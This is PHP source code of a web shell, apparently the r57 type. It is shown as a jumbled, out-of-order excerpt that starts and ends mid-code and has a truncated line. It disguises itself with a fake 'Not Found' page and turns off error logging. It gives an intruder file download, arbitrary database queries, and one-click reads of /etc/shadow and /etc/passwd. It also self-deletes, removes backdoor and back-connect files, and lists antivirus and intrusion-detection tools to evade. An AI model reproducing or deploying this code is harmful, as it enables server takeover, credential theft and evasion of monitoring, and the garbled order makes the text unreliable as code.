if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'SQLite':
$this->num_rows=@sqlite_num_rows($this->res);
$this->num_fields=@sqlite_num_fields($this->res);
while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MySQLi':
$this->dump[0] = '## MySQLi dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mSQL':
$this->dump[0] = '## mSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'SQLite':
$this->dump[0] = '## SQLite dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
case 'MySQLi':
@mysqli_close($this->connection);
break;
case 'mSQL':
@msql_close($this->connection);
break;
case 'SQLite':
@sqlite_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
case 'MySQLi':
return @mysqli_affected_rows($this->res);
break;
case 'mSQL':
return @msql_affected_rows($this->res);
break;
case 'SQLite':
return @sqlite_changes($this->res);
break;
default:
return 0;
break;
}
}
}
if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if($file=moreread($_POST['d_name'])){ $filedump = $file; }
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
if(!empty($_POST['cmd']))
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['12']))
{
@unlink(__FILE__);
}
if(isset($_GET['11']))
{
@unlink($tempdir.'bdpl');
@unlink($tempdir.'back');
@unlink($tempdir.'bd');
@unlink($tempdir.'bd.c');
@unlink($tempdir.'dp');
@unlink($tempdir.'dpc');
@unlink($tempdir.'dpc.c');
@unlink($tempdir.'prxpl');
@unlink($tempdir.'grep.txt');
}
if(isset($_GET['2']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['3']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['4']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['5']))
{$_POST['cmd'] = 'systeminfo';}
if(isset($_GET['6']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
if(isset($_GET['7']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
if(isset($_GET['8']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
if(isset($_GET['9']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
if(isset($_GET['10']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
if(isset($_GET['13']))
{$_POST['cmd']='cat /proc/cpuinfo';}
if(isset($_GET['14']))
{$_POST['cmd']='cat /proc/version';}
if(isset($_GET['15']))
{$_POST['cmd'] = 'free';}
if(isset($_GET['16']))
{$_POST['cmd'] = 'dmesg(8)';}
if(isset($_GET['17']))
{$_POST['cmd'] = 'vmstat';}
if(isset($_GET['18']))
{$_POST['cmd'] = 'lspci';}
if(isset($_GET['19']))
{$_POST['cmd'] = 'lsdev';}
if(isset($_GET['20']))
{$_POST['cmd']='cat /proc/interrupts';}
if(isset($_GET['21']))
{$_POST['cmd'] = 'cat /etc/*realise';}
if(isset($_GET['22']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
if(isset($_GET['23']))
{$_POST['cmd'] = 'lsattr -va';}
if(isset($_GET['24']))
{$_POST['cmd'] = 'w';}
if(isset($_GET['25']))
{$_POST['cmd'] = 'who';}
if(isset($_GET['26']))
{$_POST['cmd'] = 'uptime';}
if(isset($_GET['27']))
{$_POST['cmd'] = 'last -n 10';}
if(isset($_GET['28']))
{$_POST['cmd'] = 'ps -aux';}
if(isset($_GET['29']))
{$_POST['cmd'] = 'service --status-all';}
if(isset($_GET['30']))
{$_POST['cmd'] = 'ifconfig';}
if(isset($_GET['31']))
{$_POST['cmd'] = 'netstat -a';}
if(isset($_GET['32']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
if(isset($_GET['33']))
{$_POST['cmd'] = 'fdisk -l';}
if(isset($_GET['34']))
{$_POST['cmd'] = 'df -h';}
#if(isset($_GET['']))
# {$_POST['cmd'] = '';}
$lang=array(
'ru_butt1' =>'?????????',
'ru_butt2' =>'?????????',
'ru_butt3' =>'???????',
'ru_butt4' =>'?????????',
'ru_butt5' =>'?????????',
'ru_butt6' =>'???????',
'ru_butt7' =>'???????',
'ru_butt8' =>'?????????',
'ru_butt9' =>'????',
'ru_butt10'=>'?????????',
'ru_butt11'=>'?????????????',
'ru_butt12'=>'?????',
'ru_butt13'=>'???????/???????',
'ru_butt14'=>'???????',
'ru_butt15'=>'?????????',
'ru_text1' =>'??????????? ???????',
'ru_text2' =>'?????????? ?????? ?? ???????',
'ru_text3' =>'????????? ???????',
'ru_text4' =>'??????? ??????????',
'ru_text5' =>'???????? ?????? ?? ??????',
'ru_text6' =>'????????? ????',
'ru_text7' =>'??????',
'ru_text8' =>'???????? ?????',
'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
'ru_text10'=>'??????? ????',
'ru_text11'=>'?????? ??? ???????',
'ru_text12'=>'back-connect',
'ru_text13'=>'IP-?????',
'ru_text14'=>'????',
'ru_text15'=>'???????? ?????? ? ?????????? ???????',
'ru_text16'=>'????????????',
'ru_text17'=>'????????? ????',
'ru_text18'=>'????????? ????',
'ru_text19'=>'Exploits',
'ru_text20'=>'????????????',
'ru_text21'=>'????? ???',
'ru_text22'=>'datapipe',
'ru_text23'=>'????????? ????',
'ru_text24'=>'????????? ????',
'ru_text25'=>'????????? ????',
'ru_text26'=>'????????????',
'ru_text28'=>'?????? ? safe_mode',
'ru_text29'=>'?????? ????????',
'ru_text30'=>'???????? ?????',
'ru_text31'=>'???? ?? ??????',
'ru_text32'=>'?????????? PHP ????',
'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)',
'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
'ru_text36'=>'???? . ???????',
'ru_text37'=>'?????',
'ru_text38'=>'??????',
'ru_text39'=>'????',
'ru_text40'=>'???? ??????? ???? ??????',
'ru_text41'=>'????????? ? ?????',
'ru_text42'=>'?????????????? ?????',
'ru_text43'=>'????????????? ????',
'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
'ru_text45'=>'???? ????????',
'ru_text46'=>'???????? phpinfo()',
'ru_text47'=>'???????? ???????? php.ini',
'ru_text48'=>'???????? ????????? ??????',
'ru_text49'=>'???????? ??????? ? ???????',
'ru_text50'=>'?????????? ? ??????????',
'ru_text51'=>'?????????? ? ??????',
'ru_text52'=>'????? ??? ??????',
'ru_text53'=>'?????? ? ?????',
'ru_text54
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
$language='eng';
$auth = 0;
$name='';
$pass='';
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
if(@function_exists('ini_set'))
{
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);
}
else
{
@ini_alter('error_log',NULL);
@ini_alter('log_errors',0);
@ini_alter('file_uploads',1);
@ini_alter('allow_url_fopen',1);
}
error_reporting(E_ALL);
/* ??? ????? */
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
$downloaders = array('wget','fetch','lynx','links','curl','get');
/* ??? ?????? ???????? ???? ????? realpath() */
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
/******************************************************************************************************/
define("starttime",@getmicrotime());
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.42';
if(@version_compare(@phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}
if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
$tempdir='./';
$select_tempdir = '<select name=tempdir><option value="./">./</option>';
foreach( $tempdirs as $item) {
if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
}
$select_tempdir .= '</select>';
setcookie('tempdir',$tempdir);
setcookie('select_tempdir',$select_tempdir);
}else{
if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
$select_tempdir = $_COOKIE['select_tempdir'];
}
$head = '
<html>
<head>
<title>Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
color: #000000;
}
.table1 {
BORDER: 0px;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
.td1 {
BORDER: 0px;
font: 7pt Verdana;
color: #000000;
}
.tr1 {
BORDER: 0px;
color: #000000;
}
table {
BORDER: #eeeeee 1px outset;
BACKGROUND-COLOR: #D4D0C8;
color: #000000;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
color: #000000;;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
color: #000000;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
color: #000000;
}
BODY {
margin: 1px;
color: #000000;
background-color: #e4e0d8;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
function moreread($temp){
global $lang,$language;
$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
if($ffile){
while(!@feof($ffile)){$str .= @fgets($ffile);};
fclose($ffile);
}
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
if($ffile){
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
}
}elseif(@function_exists('file')&&($ffiles = @file($temp))){
foreach ($ffiles as $ffile) { $str .= $ffile; }
}elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
}elseif(@function_exists('readfile')){
$str = @readfile($temp);
}elseif(@function_exists('highlight_file')){
$str = @highlight_file($temp);
}elseif(@function_exists('show_source')){
$str = @show_source($temp);
}else{echo $lang[$language.'_text56'];}
return $str;
}
function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
if(@copy("compress.zlib://".$filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}
function morewrite($temp,$str='')
{
global $lang,$language;
if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fwrite($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fputs($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('file_put_contents')){
@file_put_contents($temp,$str);
}else return 0;
return 1;
}
function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
